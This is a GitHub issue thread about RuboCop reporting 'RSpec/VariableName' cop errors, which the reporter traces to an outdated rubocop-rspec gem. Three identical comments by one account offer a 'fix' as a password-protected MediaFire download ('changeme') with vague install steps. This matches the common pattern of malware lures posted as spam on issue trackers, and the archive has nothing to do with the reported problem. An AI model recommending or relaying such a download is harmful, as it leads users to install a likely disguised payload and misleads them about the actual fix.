### ISSUE TITLE
An error occurred while RSpec/VariableName cop was inspecting

### ISSUE THREAD

**Issue by emersonthis** [rubocop/rubocop#13180]
When I run `bundle exec rubocop` the console shows hundreds of these:
```
...
An error occurred while RSpec/VariableName cop was inspecting /somewhere/some_spec.rb:3:4.
```

After all the errors I see this recommendation:
```
Errors are usually caused by RuboCop bugs.
Please, report your problems to RuboCop's issue tracker.
https://github.com/rubocop/rubocop/issues

Mention the following information in the issue report:
1.65.1 (using Parser 3.3.4.2, rubocop-ast 1.32.1, running on ruby 3.2.2) [arm64-darwin22]
```
--------

## Expected behavior

The error described above does not happen

## Actual behavior

The error above is shown hundreds of times

Describe here what actually happened.

When I use `--debug` I see a slightly more descriptive error...

```
An error occurred while RSpec/VariableName cop was inspecting /somewhere/some_spec.rb:5:4.
wrong number of arguments (given 1, expected 0)
```

All the stack traces seems to point to `let`s like this: `let(:user) { FactoryBot.create(:user) }`

## Steps to reproduce the problem

`bundle exec rubocop`

## RuboCop version

```
1.65.1 (using Parser 3.3.4.2, rubocop-ast 1.32.1, running on ruby 3.2.2) [arm64-darwin22]
  - rubocop-rspec 2.12.1
```

In case it helps, here is my `.rubocop.yml`:

```
require:
  - rubocop-rspec

AllCops:
  Exclude:
    - node_modules/**/*
    - vendor/**/*

Metrics/BlockLength:
  Exclude:
    - spec/**/*

RSpec/ExampleLength:
  Max: 8

RSpec/Focus:
  AutoCorrect: false

RSpec/MultipleExpectations:
  Max: 3

RSpec/NestedGroups:
  Max: 4

Style/Documentation:
  Exclude:
    - spec/**/*
    - db/**/*

```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by emersonthis** [comment]
I'm not sure how it happened but I was using an older version of rubocop-rspec. I updated and those errors went away. Sorry for the false alarm.
